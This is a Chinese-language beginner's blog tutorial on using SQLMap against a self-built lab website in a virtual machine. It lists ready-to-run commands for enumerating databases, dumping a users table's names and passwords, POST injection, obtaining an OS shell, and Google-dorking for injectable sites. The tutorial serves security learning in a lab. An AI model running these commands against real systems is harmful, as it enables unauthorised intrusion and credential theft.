1 SQLMap簡(jiǎn)介

SQLMap 是一個(gè)自動(dòng)化的SQL注入工具，其主要功能是掃描、發(fā)現(xiàn)并利用給定URL的SQL注入漏洞，內(nèi)置了很多繞過(guò)插件，支持的數(shù)據(jù)庫(kù)是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server、Microsoft Access 、IBM DB2, SQ Lite 、Firebird 、Sybase和SAPMaxDB 。

注意：sqlmap只是用來(lái)檢測(cè)和利用sql注入點(diǎn)，并不能掃描出網(wǎng)站有哪些漏洞，使用前請(qǐng)先使用掃描工具掃出sql注入點(diǎn)。

SQLMap采用了以下5種獨(dú)特的SQL注入技術(shù)。
• 基于布爾類型的盲注，即可以根據(jù)返回頁(yè)面判斷條件真假的注入。
• 基于時(shí)間的盲注，即不能根據(jù)頁(yè)面返回的內(nèi)容判斷任何信息，要用條件語(yǔ)句查看時(shí)間延遲語(yǔ)句是否己執(zhí)行（即頁(yè)面返回時(shí)間是否增加）來(lái)判斷。
• 基于報(bào)錯(cuò)注入，即頁(yè)面會(huì)返回錯(cuò)誤信息，或者把注入的語(yǔ)句的結(jié)果直接返回到頁(yè)面中。
• 聯(lián)合查詢注入，在可以使用Union 的情況下的注入。. 堆查詢注入，可以同時(shí)執(zhí)行多條語(yǔ)句時(shí)的注入。

SQLMap 的強(qiáng)大的功能包括數(shù)據(jù)庫(kù)指紋識(shí)別、數(shù)據(jù)庫(kù)枚舉、數(shù)據(jù)提取、訪問(wèn)目標(biāo)文件系統(tǒng)，并在獲取完全的操作權(quán)限時(shí)實(shí)行任意命令。SQLMap的功能強(qiáng)大到讓人驚嘆，當(dāng)常規(guī)的注入工具不能利用SQL注入漏洞進(jìn)行注入時(shí)，使用SQLMap會(huì)有意想不到的效果。

2 SQLMap安裝

SQLMap的安裝方式可以自己上網(wǎng)查找，本教程是利用KaliLinux上自帶的SQLMap工具進(jìn)行相關(guān)學(xué)習(xí)與實(shí)驗(yàn)，無(wú)需自己配置python等基礎(chǔ)環(huán)境，較簡(jiǎn)單易上手，如何在虛擬機(jī)中安裝KaliLinux系統(tǒng)請(qǐng)查看《【Linux系統(tǒng)】第2節(jié) 虛擬機(jī)中安裝Kali系統(tǒng)》。

3 sqlmap的簡(jiǎn)單使用 3.1 常用命令及參數(shù)

查看sqlmap的命令字幫助手冊(cè)

-u  "url"		#檢測(cè)注入點(diǎn)
--dbs			#列出所有數(shù)據(jù)庫(kù)的名稱
--current-db	#列出當(dāng)前數(shù)據(jù)庫(kù)的名稱
-D				#指定一個(gè)數(shù)據(jù)庫(kù)
--table			#列出所有表名
-T				#指定表名
--columns		#列出所有字段名
-C				#指定字段
--dump			#列出字段內(nèi)容

post注入
-r xxx.txt #xxx.txt為http數(shù)據(jù)包

–cookie #指定cookie
–os-shell #獲取shell
sqlmap -g “inurl:php?id=” #利用google自動(dòng)搜索注入點(diǎn)

3.2 具體操作實(shí)例 3.2.1 操作前準(zhǔn)備

實(shí)驗(yàn)靶場(chǎng)——虛擬機(jī)（IP為172.16.1.1）：

本節(jié)實(shí)驗(yàn)靶場(chǎng)是在win2008系統(tǒng)上基于phpstudy搭建的一個(gè)簡(jiǎn)單網(wǎng)站，win2008及phpstudy的安裝過(guò)程可以參考《【語(yǔ)言環(huán)境】WAMP環(huán)境部署及優(yōu)化—以win2008R2SP1為操作系統(tǒng)》，網(wǎng)站的搭建過(guò)程可以參考《【(SQL+HTML+PHP)綜合】一個(gè)簡(jiǎn)單論壇網(wǎng)站的綜合開(kāi)發(fā)案例》

注入工具——kali虛擬機(jī)，自帶sqlmap工具

注意，win2008和kali橋接到同一VMnet下。兩者可以互相ping通。

3.2.2 具體實(shí)例 3.2.2.1 實(shí)例1：查看幫助手冊(cè)

sqlmap -h

3.2.2.2 實(shí)例2：檢測(cè)注入點(diǎn)及注入類型

sqlmap -u "http://172.16.1.1/PHP/jrltbbs/showmessage.php?id=5"

當(dāng)SQLMap執(zhí)行該命令時(shí)，它會(huì)執(zhí)行以下步驟：

1）判斷可注入的參數(shù)；2）判斷可以用哪種SQL注入技術(shù)來(lái)注入；3）識(shí)別出哪種數(shù)據(jù)庫(kù)；4）根據(jù)用戶選擇，讀取哪些數(shù)據(jù)。 3.2.2.3 實(shí)例3：列出所有數(shù)據(jù)庫(kù)的名字

sqlmap -u "http://172.16.1.1/PHP/jrltbbs/showmessage.php?id=5" --dbs

3.2.2.4 實(shí)例4：列出當(dāng)前數(shù)據(jù)庫(kù)的名字

sqlmap -u "http://172.16.1.1/PHP/jrltbbs/showmessage.php?id=5" --current-db

3.2.2.5 實(shí)例5：列出某數(shù)據(jù)庫(kù)的所有表名

sqlmap -u "http://172.16.1.1/PHP/jrltbbs/showmessage.php?id=5" -D 'jrlt' --tables

3.2.2.6 實(shí)例6：列出某表中的所有字段名

sqlmap -u "http://172.16.1.1/PHP/jrltbbs/showmessage.php?id=5" -D 'jrlt' -T 'users' --columns

3.2.2.7 實(shí)例7：列出某字段中的所有字段內(nèi)容

sqlmap -u "http://172.16.1.1/PHP/jrltbbs/showmessage.php?id=5" -D 'jrlt' -T 'users' -C 'name,password' --dump

3.2.2.8 實(shí)例8：post注入

首先利用burpsuite抓到使用post請(qǐng)求方法的http請(qǐng)求數(shù)據(jù)包，將該包保存為post.txt文件（保存在當(dāng)前目錄下）。輸入代碼：sqlmap -r post.txt，會(huì)自動(dòng)讀取http數(shù)據(jù)包來(lái)做個(gè)post注入的測(cè)試

在本專欄博客中，主要以入門知識(shí)為主，引領(lǐng)零基礎(chǔ)的伙伴了解一些工具的簡(jiǎn)單操作，會(huì)分享sqlmap的簡(jiǎn)單使用方法，比如：使用該軟件來(lái)判斷目標(biāo)網(wǎng)站是否存在注入、查詢獲取數(shù)據(jù)庫(kù)的庫(kù)名表名字段名以及字段內(nèi)容等信息.其他更詳細(xì)的用法可詳見(jiàn)sqlmap的幫助手冊(cè)，如-level、-referer、roles等。

4 參考文章及優(yōu)秀資源推薦

《sqlmap 詳解》
《 sqlmap 官網(wǎng)》
《sqlmap文檔地址》 

最新評(píng)論